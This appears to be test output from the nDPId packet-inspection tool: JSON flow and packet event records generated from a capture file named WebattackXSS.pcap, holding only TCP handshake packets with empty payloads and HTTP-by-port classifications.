+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1499347137239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347137239,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iNFAAD4GPP+sEAABwKgKMtLwAFB7ggVRAAAAAKACchB8NgAAAgQFtAQCCAoBOY2AAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1499347137239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347137239,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0vDqtMDQe4IFUqAScSButQAAAgQFtAQCCAoD4173ATmNgAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1499347137240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347137240,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iNJAAD4GPQasEAABwKgKMtLwAFB7ggVS6rTA0YAQAOUNvAAAAQEICgE5jYED4173"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347138552,"flow_last_seen":1499347138552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347138552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1499347138552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347138552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8erdAAD4GSxmsEAABwKgKMtL+AFByz\/R+AAAAAKACchCUZAAAAgQFtAQCCAoBOY7JAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1499347138552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347138552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0v61vhLmcs\/0f6AScSBofAAAAgQFtAQCCAoD42A\/ATmOyQEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1499347138553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347138553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0erhAAD4GSyCsEAABwKgKMtL+AFByz\/R\/tb4S54AQAOUHhAAAAQEICgE5jskD42A\/"} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347141111,"flow_last_seen":1499347141111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347141111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1499347141111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347141111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OEpAAD4GjYasEAABwKgKMtMYAFBIRqkCAAAAAKACchAH0QAAAgQFtAQCCAoBOZFIAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1499347141111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347141111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0xgJZZF8SEapA6AScSAHLAAAAgQFtAQCCAoD42K\/ATmRSAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1499347141112,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347141112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OEtAAD4GjY2sEAABwKgKMtMYAFBIRqkDCWWRfYAQAOWmMgAAAQEICgE5kUkD42K\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1469,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347142412,"flow_last_seen":1499347142412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347142412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1469,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1499347142412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347142412,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YBRAAD4GZbysEAABwKgKMtMmAFBNdfKaAAAAAKACchC3tQAAAgQFtAQCCAoBOZKOAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1499347142413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347142413,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0yYb67mHTXXym6AScSB7OgAAAgQFtAQCCAoD42QEATmSjgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1499347142413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347142413,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YBVAAD4GZcOsEAABwKgKMtMmAFBNdfKbG+u5iIAQAOUaQgAAAQEICgE5ko4D42QE"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347143676,"flow_last_seen":1499347143676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347143676,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1499347143676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347143676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BvpAAD4GvtasEAABwKgKMtM0AFB9ypUwAAAAAKACchDjgAAAAgQFtAQCCAoBOZPKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1499347143676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347143676,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0zTpUSjmfcqVMaAScSBpBAAAAgQFtAQCCAoD42VAATmTygEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1499347143677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347143677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BvtAAD4Gvt2sEAABwKgKMtM0AFB9ypUx6VEo54AQAOUIDAAAAQEICgE5k8oD42VA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347146267,"flow_last_seen":1499347146267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347146267,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1499347146267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347146267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87ydAAD4G1qisEAABwKgKMtNOAFAXjXl1AAAAAKACchBi1wAAAgQFtAQCCAoBOZZSAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1499347146268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347146268,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ006ckw3VF415dqAScSBNogAAAgQFtAQCCAoD42fIATmWUgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1499347146268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347146268,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07yhAAD4G1q+sEAABwKgKMtNOAFAXjXl2nJMN1oAQAOXsqQAAAQEICgE5llID42fI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347147523,"flow_last_seen":1499347147523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347147523,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1499347147523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347147523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jHlAAD4GOVesEAABwKgKMtNcAFBPnRvyAAAAAKACchCHAwAAAgQFtAQCCAoBOZeLAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1512,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1499347147523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347147523,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ01w4IOWQT50b86AScSD9SwAAAgQFtAQCCAoD42kCATmXiwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1499347147524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347147524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jHpAAD4GOV6sEAABwKgKMtNcAFBPnRvzOCDlkYAQAOWcUgAAAQEICgE5l4wD42kC"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1532,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347150236,"flow_last_seen":1499347150236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1499347150236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347150236,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ESlAAD4GtKesEAABwKgKMtN2AFB3vosbAAAAAKACchDs9wAAAgQFtAQCCAoBOZoyAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1499347150236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347150236,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ03aiL1kKd76LHKAScSCDEQAAAgQFtAQCCAoD42uoATmaMgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1534,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1499347150237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347150237,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ESpAAD4GtK6sEAABwKgKMtN2AFB3voscoi9ZC4AQAOUiGQAAAQEICgE5mjID42uo"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
